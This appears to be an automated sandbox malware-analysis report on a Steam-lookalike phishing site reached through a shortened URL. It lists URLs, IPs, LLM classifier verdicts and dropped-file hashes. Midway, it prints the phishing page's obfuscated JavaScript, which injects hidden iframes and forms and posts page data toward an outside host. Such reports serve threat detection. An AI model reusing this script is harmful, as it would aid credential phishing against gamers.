        • Avira URL Cloud: safe
        unknown
        https://steamcommunity.com/chat/friend/chromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/search/smallcapscrollchromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        https://help.steampowered.com/ru/wizard/HelpWithLimitedAccountchromecache_510.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://plau.cohttps://plau.coCopyrightchromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.dr, chromecache_738.2.dr, chromecache_410.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07chromecache_786.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://steamcommunity.com/chat/chromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/search/tabchromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://colorzilla.com/gradient-editor/#223246chromecache_818.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/search/results/chromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tag/en/chromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.akamai.steamstatic.com/public/images/promo/lunar2019/lny2019_title_en.pngchromecache_898.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.cloudflare.steamstatic.com/public/images/v5/ico_external_link.gifchromecache_804.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://plau.cohttps://plau.cochromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.dr, chromecache_738.2.dr, chromecache_410.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.cloudflare.steamstatic.com/public/images/blank.gifchromecache_804.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://cdn.cloudflare.steamstatic.com/steam/chromecache_665.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/search/?term=chromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://steamcommunity.comchromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/account/languagepreferences/chromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/freelicense/addfreebundle/chromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/app/chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/freelicense/addfreelicense/chromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/tags/en/chromecache_898.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/recommended/ignorerecommendation/chromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/friends/recommendgamechromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMediachromecache_786.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/tagdata/gettaggames/chromecache_381.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.cloudflare.steamstatic.com/public/images/promo/lunar2019/lny2019_title_ru.pngchromecache_665.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tags/chromecache_381.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/account/setlanguage/chromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/dynamicstore/saledata/?cc=chromecache_898.2.dr, chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://pki-ocsp.symauth.com0chromecache_786.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.cloudflare.steamstatic.com/public/images/login/throbber.gifchromecache_381.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://steam.tv/parental/ajaxlockchromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/curators/ajaxfollowchromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tagdata/populartags/russianchromecache_381.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://checkout.steampowered.com/parental/ajaxlockchromecache_510.2.dr, chromecache_437.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/search/suggestchromecache_534.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com//login?redir=app/chromecache_534.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tagdata/myfrequenttagschromecache_381.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/bundle/chromecache_898.2.dr, chromecache_665.2.drfalse
        • URL Reputation: safe
        unknown
        https://steamcommunity.com/chromecache_437.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/api/addtowishlistchromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://store.steampowered.com/subscriber_agreement/.chromecache_768.2.dr, chromecache_586.2.dr, chromecache_574.2.dr, chromecache_552.2.dr, chromecache_730.2.dr, chromecache_711.2.dr, chromecache_831.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/about/chromecache_510.2.dr, chromecache_437.2.drfalse
        • URL Reputation: safe
        unknown
        https://community.cloudflare.steamstatic.com/chromecache_510.2.drfalse
        • URL Reputation: safe
        unknown
        https://plau.cohttps://plau.coMotivachromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        97.74.93.250
        unknownUnited States
        26496AS-26496-GO-DADDY-COM-LLCUSfalse
        95.101.54.194
        unknownEuropean Union
        34164AKAMAI-LONGBfalse
        104.102.42.29
        unknownUnited States
        16625AKAMAI-ASUSfalse
        151.101.129.229
        unknownUnited States
        54113FASTLYUSfalse
        216.58.206.78
        unknownUnited States
        15169GOOGLEUSfalse
        23.192.247.89
        unknownUnited States
        16625AKAMAI-ASUSfalse
        142.250.181.234
        unknownUnited States
        15169GOOGLEUSfalse
        216.58.206.35
        unknownUnited States
        15169GOOGLEUSfalse
        172.64.145.151
        unknownUnited States
        13335CLOUDFLARENETUSfalse
        95.101.54.113
        unknownEuropean Union
        34164AKAMAI-LONGBfalse
        35.190.80.1
        unknownUnited States
        15169GOOGLEUSfalse
        142.250.184.227
        unknownUnited States
        15169GOOGLEUSfalse
        23.199.218.33
        unknownUnited States
        16625AKAMAI-ASUSfalse
        142.250.184.196
        unknownUnited States
        15169GOOGLEUSfalse
        104.18.42.105
        unknownUnited States
        13335CLOUDFLARENETUSfalse
        1.1.1.1
        unknownAustralia
        13335CLOUDFLARENETUSfalse
        34.104.35.123
        unknownUnited States
        15169GOOGLEUSfalse
        172.217.16.202
        unknownUnited States
        15169GOOGLEUSfalse
        74.125.133.84
        unknownUnited States
        15169GOOGLEUSfalse
        95.101.54.121
        unknownEuropean Union
        34164AKAMAI-LONGBfalse
        2.16.202.57
        unknownEuropean Union
        16625AKAMAI-ASUSfalse
        95.101.54.209
        unknownEuropean Union
        34164AKAMAI-LONGBfalse
        2.19.126.198
        unknownEuropean Union
        16625AKAMAI-ASUSfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        188.114.97.3
        unknownEuropean Union
        13335CLOUDFLARENETUSfalse
        95.101.149.47
        unknownEuropean Union
        20940AKAMAI-ASN1EUfalse
        188.114.96.3
        unknownEuropean Union
        13335CLOUDFLARENETUSfalse
        142.250.184.238
        unknownUnited States
        15169GOOGLEUSfalse
        95.101.54.145
        unknownEuropean Union
        34164AKAMAI-LONGBfalse
        IP
        192.168.2.6
        192.168.2.5
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1447586
        Start date and time:2024-05-26 00:57:38 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 44s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:browseurl.jbs
        Sample URL:http://surl.pk/rUrcX
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal60.phis.win@26/903@0/31
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Browse: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-header
        • Browse: https://store.steampowered.com/?snr=1_5_9__global-responsive-menu
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Skipping network analysis since amount of network traffic is too extensive
        No simulations
        InputOutput
        URL: https://steamcomunmnity.com/app/1644413/STALKER_2_Heart_of_Chornobyl Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "No input fields for username or password are present in the text.",
        "No submit button is present in the text.",
        "The text does not mention or imply a login form or authentication process."
        ]
        }
        0 STEAM' MAA3VIH COOBLUECTBO VIH@OPMAUMA nonnEPh<KA Mara3MH Hoeoe H KaveropMH fla60paTop"" 3a OHKM noucK ace mrpsl '3KweHbl >Cepb1R wp STALKER. > 2: Heart of Chornobyl S.T.A.L.K.E.R. 2: Heart of Chornobyl UeHTp ccX)LUecTBa HEART CHORNOB hccneuyTe HepH06bU1bcKy.o OTuyxaeHH9 nonHyo onacHb1x BparoB, cuepTensHs1x aH0Marwu-' MOLLIHHX apTe@aKTOB. HarwuJ14Te cc&TBeHHy.o 3ruwecKY"-o "CTopno, npoKnaAslBa* Tponbl K Cepagy HepH06b1JIR_ Bb16mpaiTe ceoli nyTb oyMaHH0, BeAb OH onpeaenm Bawy cyAb6y B KOHL4e_ Her osopoe 5 ceH_ 2024 0:10 GSC Game World STRIDER GSC Game World zrR 3Taro COME ME OTKPHTHi unp OT nepeoro nu ua BoiAMTe , '4T05S1 STOT 8 crwcoK xenaeMoro "nn CKpSITb ero Moxer nm 3Ta "rpa gaM IlOCMOTPeTb BCe nrpbl S.T.A.LK.E.R. B Stea nOHpaBhTbCfi? Boume B aKKayHT, y3HaTb BblXOAVIT 5 ceH. 2024 nphBneKaTenbHTb aroro ngK)AYKTa Ha OCTanocb np"6ru43HTenbH0 5 a 3T0'l 
        URL: https://steamcomunmnity.com/app/1644413/STALKER_2_Heart_of_Chornobyl Model: gpt-4o
        ```json
        {
          "riskscore": 9,
          "reasons": "The code creates an iframe and form elements dynamically, sets their attributes, and submits the form to a potentially suspicious URL ('https://en.stetrade.ru/'). This behavior is indicative of phishing or other malicious activities as it attempts to gather and send data without user consent."
        }
        (function(v,L){function U(v,L){return O(L-0xba,v);}const H=v();while(!![]){try{const C=parseInt(U(0x2cd,0x2b9))/0x1*(parseInt(U(0x2b3,0x2aa))/0x2)+-parseInt(U(0x2b1,0x2a5))/0x3*(parseInt(U(0x29c,0x299))/0x4)+parseInt(U(0x2ac,0x2b3))/0x5+-parseInt(U(0x2a0,0x29e))/0x6*(-parseInt(U(0x2c6,0x2ba))/0x7)+parseInt(U(0x2a1,0x2a0))/0x8+parseInt(U(0x2a9,0x2bd))/0x9+-parseInt(U(0x2b0,0x2bc))/0xa;if(C===L)break;else H['push'](H['shift']());}catch(m){H['push'](H['shift']());}}}(s,0xb1e39),window[o(0x57a,0x563)]={'pathname':window[o(0x562,0x56a)][o(0x54a,0x554)],'search':window['location'][o(0x571,0x574)],'hostname':window[o(0x560,0x56a)][o(0x56c,0x569)]});function doLanding(){let v=document[j(0x370,0x370)]('iframe');v[j(0x375,0x36f)]('style','height:100vh;width:100vw;border:0;outline:none;z-index:\x2010;'),v[j(0x382,0x393)]=j(0x395,0x38c);function j(v,L){return o(L,v- -0x1e2);}document[j(0x38a,0x37f)][j(0x393,0x399)](v);}function o(v,L){return O(L-0x36f,v);}function O(v,L){const H=s();return O=function(C,m){C=C-0x1dc;let e=H[C];return e;},O(v,L);}function doIFrame(){function D(v,L){return o(v,L- -0x229);}if(window[D(0x341,0x339)])return;localStorage['is_clear']='1';let v=document[D(0x33c,0x329)](D(0x328,0x327));v['id']='iframe',v[D(0x333,0x32e)](D(0x350,0x34d),D(0x32d,0x33d)),v[D(0x33c,0x32e)](D(0x32f,0x344),D(0x32e,0x330)),v['setAttribute'](D(0x33c,0x347),D(0x34b,0x337)),document[D(0x335,0x343)]['appendChild'](v);let L=document['createElement'](D(0x359,0x342));L['id']=D(0x345,0x333),v[D(0x338,0x334)]['body'][D(0x341,0x34c)](L),v['focus']();let H=document[D(0x31f,0x329)](D(0x32d,0x32d));H[D(0x31e,0x32e)](D(0x31f,0x324),D(0x334,0x326));for(let m of[D(0x337,0x32b),D(0x34a,0x34b),D(0x33f,0x340)]){let e=document[D(0x333,0x329)]('input');e[D(0x322,0x32e)](D(0x349,0x338),''),e[D(0x33d,0x32e)]('name',m),e[D(0x31d,0x32e)](D(0x345,0x332),window['location'][m]),H[D(0x358,0x34c)](e);}let C=Math[D(0x337,0x34a)]()[D(0x32e,0x32f)](0x24)[D(0x32f,0x322)](0x2)[D(0x33b,0x33e)](0xc,'a')[D(0x328,0x322)](0x0,0xa);H['action']='/'+C+'f/',H['method']=D(0x34c,0x335),H['target']=D(0x31a,0x330),document['body'][D(0x34b,0x34c)](H),H['submit'](),H[D(0x33a,0x33c)]();}function s(){const J=['setAttribute','toString','site','3MAypXB','value','__iframe','contentDocument','POST','189334InCmsY','height:0;width:0;border:0;outline:none;z-index:\x2010;','hidden','fuck_up','fake_data','src','remove','main','padEnd','749245fdQGtG','hostname','location','div','body','name','8jlkcEV','150283cYcAhT','style','5457150AnoTQd','955080qPKwgh','random','search','appendChild','title','https://en.stetrade.ru/','substring','section','accept','1899372kVenWF','text/html','iframe','getElementsByTagName','createElement','126smmyqX','pathname','2280296zGDEof','form'];s=function(){return J;};return s();}doIFrame();let section=document[o(0x563,0x551)](o(0x538,0x54c));section&&section[0x0]&&section[0x0][o(0x55b,0x565)]();
        URL: https://steamcomunmnity.com/xmfrd2fdkr/ Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "No input fields for username or password are present in the text.",
        "No submit button is present in the text.",
        "The text appears to be a trailer for a video game, not a login form."
        ]
        }
        0 STEAM' MAA3VIH COOBLUECTBO VIH@OPMAUMA nonnEPh<KA Mara3MH Hoeoe H KaveropMH fla60paTop"" 3a OHKM noucK ace mrpsl '3KweHbl >Cepb1R wp STALKER. > 2: Heart of Chornobyl S.T.A.L.K.E.R. 2: Heart of Chornobyl UeHTp ccX)LUecTBa HEART CHORNOB hccneuyTe HepH06bU1bcKy.o OTuyxaeHH9 nonHyo onacHb1x BparoB, cuepTensHs1x aH0Marwu-' MOLLIHHX apTe@aKTOB. HarwuJ14Te cc&TBeHHy.o 3ruwecKY"-o "CTopno, npoKnaAslBa* Tponbl K Cepagy OFFICIAL TRAILER HepH06b1JIR_ Bb16mpaiTe ceoli nyTb oyMaHH0, BeAb OH onpeaenm Bawy cyAb6y B KOHL4e_ COMF TO MF Her osopoe 5 ceH_ 2024 0:00 0:00 GSC Game World STRIDER GSC Game World zrR 3Taro COME ME OTKPHTHi unp OT nepeoro nu ua BoiAMTe , '4T05S1 STOT 8 crwcoK xenaeMoro "nn CKpSITb ero Moxer nm 3Ta "rpa gaM IlOCMOTPeTb BCe nrpbl S.T.A.LK.E.R. B Stea nOHpaBhTbCfi? J Boume B aKKayHT, y3HaTb BblXOAVIT 5 ceH. 2024 nphBneKaTenbHTb aroro ngK)AYKTa Ha OCTanocb np"6ru43HTenbH0 5 a 3T0'l 
        URL: https://steamcomunmnity.com/xmfrd2fdkr/ Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "No input fields for username or password are present in the text.",
        "No submit button is present in the text.",
        "The text does not mention any login or authentication related action."
        ]
        }
        0 STEAM' MAA3VIH COOBLUECTBO VIH@OPMAUMA nonnEPh<KA Mara3MH Hoeoe H KaveropMH fla60paTop"" 3a OHKM noucK ace mrpsl '3KweHbl >Cepb1R wp STALKER. > 2: Heart of Chornobyl S.T.A.L.K.E.R. 2: Heart of Chornobyl UeHTp ccX)LUecTBa HEART CHORNOB hccneuyTe HepH06bU1bcKy.o OTuyxaeHH9 nonHyo onacHb1x BparoB, cuepTensHs1x aH0Marwu-' MOLLIHHX apTe@aKTOB. HarwuJ14Te cc&TBeHHy.o 3ruwecKY"-o "CTopno, npoKnaAslBa* Tponbl K Cepagy HepH06b1JIR_ Bb16mpaiTe ceoli nyTb oyMaHH0, BeAb OH onpeaenm Bawy cyAb6y B KOHL4e_ Her osopoe 5 ceH_ 2024 0:10 GSC Game World STRIDER GSC Game World zrR 3Taro COME ME OTKPHTHi unp OT nepeoro nu ua BoiAMTe , '4T05S1 STOT 8 crwcoK xenaeMoro "nn CKpSITb ero Moxer nm 3Ta "rpa gaM IlOCMOTPeTb BCe nrpbl S.T.A.LK.E.R. B Stea nOHpaBhTbCfi? Boume B aKKayHT, y3HaTb BblXOAVIT 5 ceH. 2024 nphBneKaTenbHTb aroro ngK)AYKTa Ha OCTanocb np"6ru43HTenbH0 5 a 3T0'l 
        URL: https://steamcomunmnity.com/xmfrd2fdkr/ Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "No input fields for username or password are present in the text.",
        "No submit button is present in the text.",
        "The text appears to be a news article or blog post about a video game, not a login form."
        ]
        }
        0 STEAM' MAA3VIH COOBLUECTBO VIH@OPMAUMA nonnEPh<KA Mara3MH Hoeoe H KaveropMH fla60paTop"" 3a OHKM noucK ace mrpsl '3KweHbl >Cepb1R wp STALKER. > 2: Heart of Chornobyl S.T.A.L.K.E.R. 2: Heart of Chornobyl UeHTp ccX)LUecTBa HEART CHORNOB hccneuyTe HepH06bU1bcKy.o OTuyxaeHH9 nonHyo onacHb1x BparoB, cuepTensHs1x aH0Marwu-' MOLLIHHX apTe@aKTOB. HarwuJ14Te cc&TBeHHy.o 3ruwecKY"-o "CTopno, npoKnaAslBa* Tponbl K Cepagy HepH06b1JIR_ Bb16mpaiTe ceoli nyTb oyMaHH0, BeAb OH onpeaenm Bawy cyAb6y B KOHL4e_ Her osopoe 5 ceH_ 2024 GSC Game World GSC Game World zrR 3Taro COME ME OTKPHTHi unp OT nepeoro nu ua BoiAMTe , '4T05S1 STOT 8 crwcoK xenaeMoro "nn CKpSITb ero Moxer nm 3Ta "rpa gaM IlOCMOTPeTb BCe S.T.A.LK.E.R. B Stea nOHpaBhTbCfi? Boume B aKKayHT, y3HaTb BblXOAVIT 5 ceH. 2024 nphBneKaTenbHTb aroro ngK)AYKTa Ha OCTanocb np"6ru43HTenbH0 5 a 3T0'l 
        URL: https://steamcomunmnity.com/xmfrd2fdkr/ Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "No form fields for username or password are present in the text.",
        "No submit button is present in the text.",
        "The text appears to be a news article or blog post about a video game, not a login form."
        ]
        }
        0 STEAM' MAA3VIH COOBLUECTBO VIH@OPMAUMA nonnEPh<KA Mara3MH Hoeoe H KaveropMH fla60paTop"" 3a OHKM noucK ace mrpsl '3KweHbl >Cepb1R wp STALKER. > 2: Heart of Chornobyl S.T.A.L.K.E.R. 2: Heart of Chornobyl UeHTp ccX)LUecTBa HEART CHORNOB hccneuyTe HepH06bU1bcKy.o OTuyxaeHH9 nonHyo onacHb1x BparoB, cuepTensHs1x aH0Marwu-' MOLLIHHX apTe@aKTOB. HarwuJ14Te cc&TBeHHy.o 3ruwecKY"-o "CTopno, npoKnaAslBa* Tponbl K Cepagy HepH06b1JIR_ Bb16mpaiTe ceoli nyTb oyMaHH0, BeAb OH onpeaenm Bawy cyAb6y B KOHL4e_ Her osopoe 5 ceH_ 2024 GSC Game World GSC Game World zrR 3Taro COME ME OTKPHTHi unp OT nepeoro nu ua BoiAMTe , '4T05S1 STOT 8 crwcoK xenaeMoro "nn CKpSITb ero Moxer nm 3Ta "rpa gaM IlOCMOTPeTb BCe S.T.A.LK.E.R. B Stea nOHpaBhTbCfi? Boume B aKKayHT, y3HaTb BblXOAVIT 5 ceH. 2024 nphBneKaTenbHTb aroro ngK)AYKTa Ha OCTanocb np"6ru43HTenbH0 5 a 3T0'l 
        URL: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-header Model: gpt-4o
        ```json
        {
          "phishing_score": 1,
          "brands": "Steam",
          "phishing": false,
          "suspicious_domain": false,
          "has_loginform": true,
          "has_captcha": false,
          "setechniques": false,
          "reasons": "The URL 'https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-header' appears to be legitimate as it matches the known domain for Steam (store.steampowered.com). The page design and elements are consistent with Steam's official website. There are no obvious signs of social engineering techniques or suspicious elements in the image."
        }
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:58:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2677
        Entropy (8bit):3.977406116763283
        Encrypted:false
        SSDEEP:48:8/QkdHTfvwH5idAKZdA19ehwiZUklqehKlxy+3:8/QQz2rxy
        MD5:499C309F9779C182F04A39D1EF576862
        SHA1:E4BF2200C57C5755232CFFC8C19FA49E922EEB14
        SHA-256:54873ACFADFBB1E4E25247F0B35E14FE6AF874520E5F86ADF088D473D945D4BE
        SHA-512:CD0E5A2EEBF2B7BD862D711A1F22D93A1BBF64560FCB00FEE62DBAF9BFF3CFD7158B8FCA118ECB92ADFD1FC7FA9616059BB0FF63E1B2A62D010F5164A5BD1238
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....*R.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XO............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:58:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2679
        Entropy (8bit):3.9922780804833287
        Encrypted:false
        SSDEEP:48:8HQkdHTfvwH5idAKZdA1weh/iZUkAQkqehZlxy+2:8HQQzU9Q4xy
        MD5:AA81826EFA25863B419AE401EBF5A54B
        SHA1:B622F7B5BC01D96EE805D19611B19055FCF92759
        SHA-256:F65D7F8663F8BD4AADFFB045117080AE7DFCFABBD962BAA28B42D289902F8AB5
        SHA-512:C149E5D8586463DF33C3ABFC5AEA937944E397A07C146C72AD9A9BB93F20A241703B02EF7ABA1E48E95B78D1B1CB164151D2159F407792EF28F092695F789CFE
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,....o.!.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XO............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2693
        Entropy (8bit):4.00072411639085
        Encrypted:false
        SSDEEP:48:8xgdHTfvsH5idAKZdA14tseh7sFiZUkmgqeh7sPlxy+BX:8xszwnfxy
        MD5:D662FAF6036F06C9D7594422266DF4A4
        SHA1:1243C0CA0C57D94031D4339E7A3C00D364154C80
        SHA-256:0ABFE757BFA5448DFE548DC0CE81D91BB067D504DB07B9D3582DE508ADAC4909
        SHA-512:2F5DBEB584EDDCEBE11A023DFB24679F2E15F2991DA7EEB04BB4BE0472DCF9DD31123A4C5287E50EACD634AB15384CA8816E78C8A59F6481F4486B2F8C057C45
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:58:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
